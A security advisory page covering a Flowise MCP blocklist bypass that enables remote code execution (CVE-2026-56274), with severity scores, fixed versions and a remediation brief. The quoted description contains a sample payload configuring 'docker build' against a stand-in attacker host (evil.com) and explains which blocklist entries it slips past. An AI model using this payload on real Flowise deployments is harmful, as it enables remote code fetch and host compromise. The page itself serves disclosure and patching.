Skip to content

← Actionable
High, CVSS 8.7amended

Flowise has an MCP Security Bypass that Enables RCE

CVE-2026-56274GHSA-m99r-2hxc-cp3q

What to do

Vendor fix available. Upgrade each affected package to the fixed version on its release line (flowise-components 3.1.2; flowise 3.1.2), redeploy, then verify what is actually installed.

This page has no inventory attached, so it cannot say whether you are affected. A vendor fix is not proof that your deployment is fixed.

Affected packages

Sources

Severity and exploitation
Exploitation
No confirmed exploitation recorded. Patch Next marks exploitation only from CISA KEV.
CVSS 4.0
8.7 · CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N · score source
EPSS
  • CVE-2026-56274: 7.52% estimated exploitation activity in the next 30 days; percentile 94.51 (FIRST EPSS, 2026-11-03). This is a model estimate, not proof of exploitation or customer exposure.
Source description

As published by the source; long descriptions are shortened.

Summary There are three bypass methods for the security limitations of the Flowise MCP feature, and attackers can execute arbitrary commands by combining these three methods Details 【Vulnerability one】The Docker build subcommand not being on the blocklist leads to remote code execution The attacker configures the interface through the MCP tool to provide {"command":"docker","args":["build","https://evil.com/"]} as the Custom MCP Server configuration → Bypass the validateCommandFlags docker blocklist (only blocks run/exec/-v/--volume, etc., but does not block build) → docker build <remote-URL will pull the Dockerfile from the remote address and execute the RUN instructions within it → Allows attackers to escape from Docker through methods such as mounting, thereby gaining full control of the Flowise host machine Precondition: 1. Have a Flowise account (any role, including regular users) or an API with view&update permissions for chatflows 2. The deployment environment has the docker…

Dates and revisions
Published by the source
Last modified by the source
Source last checked
  1. Revision 3 · amended ·

    Amended from ghsa record GHSA-m99r-2hxc-cp3q

  2. Revision 2 · amended ·

    Reviewed OSV alias/range/CVSS4 correction; package source scopes and original publication preserved. No customer finding resolved.

  3. Revision 1 · created ·

    Published from osv record GHSA-m99r-2hxc-cp3q

Agent brief

Preview the exact text before you copy it. Commands are read-only suggestions; review them before running anything.

# Patch Next advisory brief: CVE-2026-56274

Advisory: Flowise has an MCP Security Bypass that Enables RCE
IDs: CVE-2026-56274, GHSA-m99r-2hxc-cp3q
Record: https://patchnext.com/advisories/cve-2026-56274 (revision 3, source checked 26 Oct 2026, 12:52 UTC)
Inventory: none attached. This brief comes from a public page and does not say whether any deployment is affected.
Severity: High (CVSS 8.7)
Exploitation: no confirmed exploitation recorded. Patch Next confirms exploitation only from CISA KEV.
Vendor response: Vendor fix available; fixed versions by package: flowise-components 3.1.2; flowise 3.1.2. A vendor fix does not mean a deployment is fixed.

## Affected components
- npm flowise-components: affected <= 3.1.1; fixed in 3.1.2
- npm flowise: affected <= 3.1.1; fixed in 3.1.2

## Suggested inspection (read-only)
- `npm ls flowise-components --all`: lists every installed copy and version, including transitive ones. Run in the project root after `npm ci`.
- `npm ls flowise --all`: lists every installed copy and version, including transitive ones. Run in the project root after `npm ci`.

## Supported action
Upgrade each affected component to a fixed version on its release line. For a transitive dependency, upgrade the parent package or add an override or constraint, then regenerate the lockfile. Redeploy every environment that ran an affected version.

## Required regression checks
- Run the test suite and a production build.
- Exercise the features that depend on flowise-components, flowise.
- Repeat the inspection and confirm that only fixed versions remain installed.

## Rollback considerations
- Keep the previous lockfile and deployment artifact. Rolling back reinstates the vulnerable version, so apply any documented mitigation while you fix forward.

## Unresolved questions
- Which deployments run an affected version?
- Exploitation status can change. Check again before lowering the priority.
- Mark the work resolved only after the fixed version is verified in production.

## Sources
- Verified: https://osv.dev/vulnerability/GHSA-m99r-2hxc-cp3q (OSV record GHSA-m99r-2hxc-cp3q lists affected ranges: npm flowise >=0 =0 <3.1.2 (fixed))
- Verified: https://github.com/advisories/GHSA-m99r-2hxc-cp3q (GitHub-reviewed advisory GHSA-m99r-2hxc-cp3q lists affected ranges: npm flowise >=0 =0 <=3.1.1)

Commands are suggestions: review each one before running it.

Loading voting…